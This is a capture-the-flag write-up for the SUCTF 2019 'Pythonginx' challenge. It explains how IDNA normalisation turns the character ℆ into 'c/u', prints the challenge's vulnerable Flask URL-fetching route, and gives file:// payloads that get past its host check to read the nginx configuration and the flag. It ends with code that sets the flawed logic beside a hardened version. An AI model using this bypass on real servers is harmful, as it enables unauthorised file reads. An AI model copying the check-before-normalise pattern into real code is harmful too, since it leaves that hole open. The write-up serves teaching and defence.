[SUCTF 2019] Pythonginx
Knowledge points
idna
I had seen this kind of Unicode trick with idna once before, in a Black Hat 2019 slide deck.
Wikipedia describes idna roughly like this:
An internationalized domain name (IDN) is an Internet domain name that contains at least one label that is displayed in software applications, in whole or in part, in a language-specific script or alphabet, such as Arabic, Chinese, Cyrillic, Devanagari, Hebrew or the Latin alphabet-based characters with diacritics or ligatures, such as French. These writing systems are encoded by computers in multibyte Unicode. Internationalized domain names are stored in the Domain Name System (DNS) as ASCII strings using Punycode transcription.
In short, it is an encoding designed to unify domain names that contain the special characters of different countries' scripts; idna uses Punycode for the encoding.
When we encode a string with idna and then decode the result as utf-8, some characters are transformed in special ways (mapped to sequences of plain ASCII characters). If the browser or the backend then mistakes that result for an ordinary utf-8 string and acts on it, serious security problems follow.
Solution
Entering the challenge, we see the source:
```python
# Imports and the Flask app object are not shown on the original page;
# they are added here so the route runs as written.
from flask import Flask, request
from urllib import parse
from urllib.parse import urlsplit, urlunsplit
import urllib.request

app = Flask(__name__)


@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    # strip spaces from the url
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"
```
<!-- Dont worry about the suctf.cc. Go on! -->
<!-- Do you know the nginx? -->
Useful information we get from this:
1. The input is processed with h.encode('idna').decode('utf-8')
2. The entry point is the string suctf.cc
3. The server is nginx, so we probably need to read the nginx configuration file
The nginx configuration file is at /usr/local/nginx/conf/nginx.conf
We can see that the characters c and u can be obtained together from a single character, ℆, which the idna codec normalizes to c/u. That is enough to read the configuration file directly.
Read the file through the file protocol:
file://suctf.c℆sr/local/nginx/conf/nginx.conf
```nginx
server {
    listen 80;
    location / {
        try_files $uri @app;
    }
    location @app {
        include uwsgi_params;
        uwsgi_pass unix:///tmp/uwsgi.sock;
    }
    location /static {
        alias /app/static;
    }
    # location /flag {
    #     alias /usr/fffffflag;
    # }
}
```
Then read the flag:
file://suctf.c℆sr/fffffflag
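As an added illustration (my own code, not part of the original write-up or the challenge), the check-before-canonicalise gap of the route above placed beside a hardened version; ALLOWED_HOST, LDH_LABEL and the function names are assumptions for this example. It takes the URL already split into components because current CPython's urlsplit refuses a netloc whose NFKC form would introduce '/', a guard the challenge's Python did not have.

```python
import re
from typing import Optional
from urllib.parse import urlparse, urlunsplit

ALLOWED_HOST = "suctf.cc"  # assumed allow-list entry, taken from the challenge
# A valid hostname label after IDNA encoding: ASCII letters, digits, hyphens only.
LDH_LABEL = re.compile(r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?")


def idna_host(host: str) -> str:
    """The challenge's normalisation step, label by label, via the 'idna' codec.
    The codec applies nameprep (NFKC), so U+2106 (℆) becomes the ASCII run 'c/u'."""
    return ".".join(label.encode("idna").decode("utf-8") for label in host.split("."))


def vulnerable_fetch_target(scheme: str, raw_host: str, path: str) -> Optional[str]:
    """Mirrors the challenge's ordering: the deny check compares the raw host, the
    allow check (and the fetch) use the hostname of the rebuilt URL. Takes components
    instead of a URL string because current CPython's urlsplit refuses a netloc whose
    NFKC form introduces '/' (the challenge ran on a Python without that guard).
    Returns the URL that would be fetched, or None."""
    if raw_host == ALLOWED_HOST:
        return None
    final = urlunsplit((scheme, idna_host(raw_host), path, "", ""))
    return final if urlparse(final).hostname == ALLOWED_HOST else None


def hardened_fetch_target(scheme: str, raw_host: str, path: str) -> Optional[str]:
    """Canonicalise first, validate the canonical form, fetch exactly that form:
    http(s) only; every encoded label must be plain LDH ASCII, which also rejects
    userinfo, ports and any delimiter NFKC produced; host must match the allow-list."""
    if scheme not in ("http", "https"):
        return None
    try:
        host = idna_host(raw_host.lower())
    except UnicodeError:  # empty or over-long label, or a prohibited code point
        return None
    if not all(LDH_LABEL.fullmatch(label) for label in host.split(".")):
        return None  # the label 'cc/usr' from the write-up's payload fails here
    if host != ALLOWED_HOST:
        return None
    return urlunsplit((scheme, host, path, "", ""))


if __name__ == "__main__":
    # Constructed input: the write-up's payload split into its three components.
    payload = ("file", "suctf.c\u2106sr", "/local/nginx/conf/nginx.conf")
    print("challenge logic would fetch:", vulnerable_fetch_target(*payload))
    print("hardened logic would fetch: ", hardened_fetch_target(*payload))
```

The lesson for the route above is that every decision must be taken on the canonical value that is actually fetched, and that the canonical value must be validated as a hostname, not merely compared.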